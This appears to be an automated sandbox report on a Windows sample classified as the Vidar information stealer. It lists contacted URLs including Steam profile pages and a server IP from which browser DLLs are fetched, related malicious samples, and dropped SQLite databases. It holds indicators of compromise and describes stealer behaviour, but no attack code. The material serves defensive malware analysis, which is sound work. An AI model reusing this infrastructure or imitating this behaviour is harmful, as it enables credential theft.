                                                                                                                      https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=enRegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.drfalse
                                                                                                                        high
                                                                                                                        https://steamcommunity.com/discussions/RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.drfalse
                                                                                                                          high
                                                                                                                          https://store.steampowered.com/stats/RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.drfalse
                                                                                                                            high
                                                                                                                            https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.drfalse
                                                                                                                              high
                                                                                                                              https://store.steampowered.com/steam_refunds/RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.drfalse
                                                                                                                                high
                                                                                                                                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchBAAFIJKK.1.drfalse
                                                                                                                                  high
                                                                                                                                  https://steamcommunity.com/HRegAsm.exe, 00000001.00000002.2461606471.0000000001493000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=96N66CvLHly8&aRegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.drfalse
                                                                                                                                      high
                                                                                                                                      https://steamcommunity.com/workshop/RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.drfalse
                                                                                                                                        high
                                                                                                                                        https://store.steampowered.com/legal/RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.drfalse
                                                                                                                                          high
                                                                                                                                          https://t.me/snsb82file.exe, file.exe, 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, RegAsm.exe, 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=eRegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.drfalse
                                                                                                                                              high
                                                                                                                                              http://www.sqlite.org/copyright.html.RegAsm.exe, 00000001.00000002.2462673623.0000000013EE8000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmp, sqln[1].dll.1.drfalse
                                                                                                                                                high
                                                                                                                                                https://95.217.244.99EGHJRegAsm.exe, 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                low
                                                                                                                                                https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSvRegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl76561199677575543[1].htm.1.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://www.google.com/images/branding/product/ico/googleg_lodp.icoBAAFIJKK.1.drfalse
                                                                                                                                                      high
                                                                                                                                                      https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=C4KxRegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.drfalse
                                                                                                                                                        high
                                                                                                                                                        https://steamcommunity.com/profiles/76561199677575543wRegAsm.exe, 00000001.00000002.2461606471.0000000001493000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://recaptcha.netRegAsm.exe, 00000001.00000002.2461606471.0000000001493000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          unknown
                                                                                                                                                          http://upx.sf.netAmcache.hve.6.drfalse
                                                                                                                                                            high
                                                                                                                                                            https://store.steampowered.com/76561199677575543[1].htm.1.drfalse
                                                                                                                                                              high
                                                                                                                                                              https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvwRegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.drfalse
                                                                                                                                                                high
                                                                                                                                                                https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gifRegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.drfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLhRegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.drfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://ac.ecosia.org/autocomplete?q=BAAFIJKK.1.drfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://95.217.244.99/nss3.dlljLRegAsm.exe, 00000001.00000002.2461606471.00000000014C5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                      unknown
                                                                                                                                                                      https://95.217.244.99/vcruntime140.dlluRegAsm.exe, 00000001.00000002.2461606471.00000000014C5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                      unknown
                                                                                                                                                                      https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.drfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=englishRegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.drfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://95.217.244.99/BRegAsm.exe, 00000001.00000002.2461606471.0000000001493000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                          unknown
                                                                                                                                                                          https://api.steampowered.com/RegAsm.exe, 00000001.00000002.2461606471.0000000001493000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            http://store.steampowered.com/account/cookiepreferences/RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.drfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://store.steampowered.com/mobileRegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.drfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://steamcommunity.com/76561199677575543[1].htm.1.drfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=BAAFIJKK.1.drfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    • No. of IPs < 25%
                                                                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                                                                    • 75% < No. of IPs
                                                                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                    95.217.244.99
                                                                                                                                                                                    unknownGermany
                                                                                                                                                                                    24940HETZNER-ASDEfalse
                                                                                                                                                                                    23.47.27.74
                                                                                                                                                                                    steamcommunity.comUnited States
                                                                                                                                                                                    16625AKAMAI-ASUSfalse
                                                                                                                                                                                    Joe Sandbox version:40.0.0 Tourmaline
                                                                                                                                                                                    Analysis ID:1430555
                                                                                                                                                                                    Start date and time:2024-04-23 21:43:08 +02:00
                                                                                                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                                                                                                    Overall analysis duration:0h 7m 0s
                                                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                                                    Report type:full
                                                                                                                                                                                    Cookbook file name:default.jbs
                                                                                                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                    Number of analysed new started processes analysed:10
                                                                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                                                                    Technologies:
                                                                                                                                                                                    • HCA enabled
                                                                                                                                                                                    • EGA enabled
                                                                                                                                                                                    • AMSI enabled
                                                                                                                                                                                    Analysis Mode:default
                                                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                                                    Sample name:file.exe
                                                                                                                                                                                    Detection:MAL
                                                                                                                                                                                    Classification:mal100.troj.spyw.evad.winEXE@4/27@1/2
                                                                                                                                                                                    EGA Information:
                                                                                                                                                                                    • Successful, ratio: 100%
                                                                                                                                                                                    HCA Information:
                                                                                                                                                                                    • Successful, ratio: 92%
                                                                                                                                                                                    • Number of executed functions: 78
                                                                                                                                                                                    • Number of non-executed functions: 200
                                                                                                                                                                                    Cookbook Comments:
                                                                                                                                                                                    • Found application associated with file extension: .exe
                                                                                                                                                                                    • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                                                                                                                    • Excluded IPs from analysis (whitelisted): 52.182.143.212
                                                                                                                                                                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, onedsblobprdcus15.centralus.cloudapp.azure.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                    • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                    • VT rate limit hit for: file.exe
                                                                                                                                                                                    TimeTypeDescription
                                                                                                                                                                                    21:43:58API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                                                                                                                    21:44:00API Interceptor1x Sleep call for process: RegAsm.exe modified
                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                    95.217.244.99file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                      23.47.27.74https://steamfiller.ru/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                        SecuriteInfo.com.W32.Kryptik.GYGF.tr.29287.4482.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, SmokeLoader, VidarBrowse
                                                                                                                                                                                          i1crvbOZAP.exeGet hashmaliciousAmadey, Glupteba, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, SmokeLoaderBrowse
                                                                                                                                                                                            yU3icg18lq.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                              steamcommunity.comfile.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                              • 23.65.246.108
                                                                                                                                                                                              file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                              • 184.27.10.105
                                                                                                                                                                                              file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                              • 23.61.62.148
                                                                                                                                                                                              file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                              • 184.30.122.179
                                                                                                                                                                                              SamFw Tool 4.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                              • 23.4.32.216
                                                                                                                                                                                              8xFzJWrEIa.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, RedLine, SmokeLoader, VidarBrowse
                                                                                                                                                                                              • 23.4.32.216
                                                                                                                                                                                              file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                              • 23.61.62.148
                                                                                                                                                                                              file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                              • 184.30.122.179
                                                                                                                                                                                              file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                              • 104.67.208.180
                                                                                                                                                                                              SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeGet hashmaliciousPureLog Stealer, VidarBrowse
                                                                                                                                                                                              • 23.76.43.59
                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                              AKAMAI-ASUShttps://sunhos-my.sharepoint.com/:b:/g/personal/mcaffrey_suncrestcare_com/EVEm8VhV9TBDp7AQUrliImYB4Kt7rXcd_m6-8qNUjxBhTA?e=P3XNTL&xsdata=MDV8MDJ8cHJpY2hhcmRzb25AY2FsdG9uLmNvbXxkM2U5ZTc1MTlkNDA0NmI2OWMzODA4ZGM2M2JhOTA4Y3w3YjU1NzU2YTg5NTg0ZWNlODFkYzVkYTZhYmRiNmE5N3wwfDB8NjM4NDk0OTAwMTUyMzMwMjUxfFVua25vd258VFdGcGJHWnNiM2Q4ZXlKV0lqb2lNQzR3TGpBd01EQWlMQ0pRSWpvaVYybHVNeklpTENKQlRpSTZJazFoYVd3aUxDSlhWQ0k2TW4wPXwwfHx8&sdata=TldIbEg2OTJiSkRUS29RRElmU3dYbTBRQUlqUTBBMXZPcGlIaTlzNnlOQT0%3dGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                              • 23.50.113.17
                                                                                                                                                                                              file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                              • 23.65.246.108
                                                                                                                                                                                              Remittance. #U0440df.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                              • 23.193.106.150
                                                                                                                                                                                              https://netorgft12232017-my.sharepoint.com:443/:f:/g/personal/lisa_imjts_com/EsnpAMoHQfhBluK8Y5tDE68BaHrT-12huxTJR_ZqVWR4tA?e=5%3aZZh3dZ&at=9Get hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 23.210.240.138
                                                                                                                                                                                              https://www.msn.com/en-us/autos/enthusiasts/what-s-the-difference-between-a-shelby-mustang-and-a-regular-mustang/ar-AA1ntM5Z?ocid=entnewsntp&pc=U531&cvid=8b8aa9e3e14d4164a6a2181020104694&ei=36Get hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 23.54.44.246
                                                                                                                                                                                              1mHUcsxKG6.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                              • 23.61.238.0
                                                                                                                                                                                              file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                              • 184.27.10.105
                                                                                                                                                                                              sora.arm.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                              • 172.226.192.139
                                                                                                                                                                                              sora.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                              • 172.228.222.88
                                                                                                                                                                                              Gam.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 23.46.224.162
                                                                                                                                                                                              HETZNER-ASDEhttps://webmail.cmxserver.com/authsecure/index.php?email=kaylen@virtualintelligencebriefing.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 136.243.80.35
                                                                                                                                                                                              file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                              • 95.217.244.99
                                                                                                                                                                                              #4711 Cotizaci#U00f3n.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                              • 94.130.55.203
                                                                                                                                                                                              https://go-g3t-msg.com/clk/a_OsB_gBHRWO62vTWAvzpOfGhlvCmgnqQuB_nVFpwp0KsQNH4MVSSKRIuzJYdR_BaVVJ5ZUVsLA7nr4fsUb6_LUiF6WGpw3bjwuz5vIgSMwTtrE34sfAdm_UkarEQxhut5pfRW1RXCEHttsR2H4S_hK5eTdM2QP7CpynnqXHAbBrQcsZM-9kqSh5d_nLiZhEZPZ8-fFHjtAo-IjMx8qNxpwUaG3dVXhIP_Sup8raijFjXrg2qZL33tH_5PvkpDXJwZtdK-fqRvdTEjPP1v26xG4zHKIduU5irbL6N1Be1W_4vpi6D3s8twjJ8VAELgUZErAiigzfRVU0knOdQpcprkwW48npT3pYYpFqQU_lE9JBwESVd70JOVQuZWj_0cT7YVVRRta1y8F8vjFBDtNL73BXlqjP5sWlGZtuOnQDJ-iEKMXGy1W4uSrGBn5j07qBR3I1glqsVkAz7msz4iUFsVZ76hS_yvRcDNZBMYnXgKJRgA1A2nVJ9rwv5a55G82GhCYmOQvkUs0eG7vFHjr8gNQtxUn0q5LeVhTPJbym_uRj-gxiLJDjsLnSJXJ4eGtDvxVqhkaqM2P03jYs6BzR_fyd4ak2ZNKBm4FiGWKP44e6keEO2eNlfhZPBYG9OMlI3UM7jaU5YayqoO3ZGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 178.63.248.54
                                                                                                                                                                                              file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                              • 95.217.9.149
                                                                                                                                                                                              https://www.sushi-idea.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 168.119.90.21
                                                                                                                                                                                              BitTorrent-7.6.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 49.12.86.202
                                                                                                                                                                                              BitTorrent-7.6.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 168.119.13.211
                                                                                                                                                                                              scripttodo.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 46.4.134.23
                                                                                                                                                                                              scripttodo.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 46.4.134.23
                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                              51c64c77e60f3980eea90869b68c58a8file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                              • 95.217.244.99
                                                                                                                                                                                              file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                              • 95.217.244.99
                                                                                                                                                                                              file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                              • 95.217.244.99
                                                                                                                                                                                              file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                              • 95.217.244.99
                                                                                                                                                                                              SamFw Tool 4.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                              • 95.217.244.99
                                                                                                                                                                                              8xFzJWrEIa.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, RedLine, SmokeLoader, VidarBrowse
                                                                                                                                                                                              • 95.217.244.99
                                                                                                                                                                                              file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                              • 95.217.244.99
                                                                                                                                                                                              file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                              • 95.217.244.99
                                                                                                                                                                                              file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                              • 95.217.244.99
                                                                                                                                                                                              SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeGet hashmaliciousPureLog Stealer, VidarBrowse
                                                                                                                                                                                              • 95.217.244.99
                                                                                                                                                                                              37f463bf4616ecd445d4a1937da06e19file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                              • 23.47.27.74
                                                                                                                                                                                              768.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 23.47.27.74
                                                                                                                                                                                              file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                              • 23.47.27.74
                                                                                                                                                                                              anuwhqTXGt.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 23.47.27.74
                                                                                                                                                                                              anuwhqTXGt.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 23.47.27.74
                                                                                                                                                                                              PO 26519PZ F30 59.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                              • 23.47.27.74
                                                                                                                                                                                              Texas_Tool_Purchase_Order#T18834-1.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                                                                              • 23.47.27.74
                                                                                                                                                                                              TRANSPORT_INSTRUCTION_MR.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                                                                              • 23.47.27.74
                                                                                                                                                                                              Gesti#U00f3n Pago a Proveedores - Liquidaci#U00f3n anticipo.htaGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                                                                              • 23.47.27.74
                                                                                                                                                                                              shipping document.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                              • 23.47.27.74
                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                              C:\ProgramData\IDHIIJJJKEGI\mozglue.dllMBSetup.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                MBSetup.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                  file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                    QEO2mJ8xHx.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                      j36lCJ7IcT.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                        file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                          YY8EqpwVDY.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                            bhhPvHM59A.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                              tt1pR7pJbF.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                IvxnEUAtC3.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                  C:\ProgramData\IDHIIJJJKEGI\freebl3.dllMBSetup.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                    MBSetup.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                      file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                        QEO2mJ8xHx.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                          j36lCJ7IcT.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                            file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                              YY8EqpwVDY.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                                bhhPvHM59A.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                  tt1pR7pJbF.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                    IvxnEUAtC3.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):20480
                                                                                                                                                                                                                                      Entropy (8bit):0.8508558324143882
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                                                                                                                                                                                                      MD5:933D6D14518371B212F36C3835794D75
                                                                                                                                                                                                                                      SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                                                                                                                                                                                                      SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                                                                                                                                                                                                      SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:moderate, very likely benign file
                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):106496
                                                                                                                                                                                                                                      Entropy (8bit):1.136471148832945
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                                                                                                                                                                      MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                                                                                                                                                                      SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                                                                                                                                                                      SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                                                                                                                                                                      SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:moderate, very likely benign file
                                                                                                                                                                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):155648
                                                                                                                                                                                                                                      Entropy (8bit):0.5407252242845243
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                                                                                                                                                                                      MD5:7B955D976803304F2C0505431A0CF1CF
                                                                                                                                                                                                                                      SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                                                                                                                                                                      SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                                                                                                                                                                                      SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:high, very likely benign file
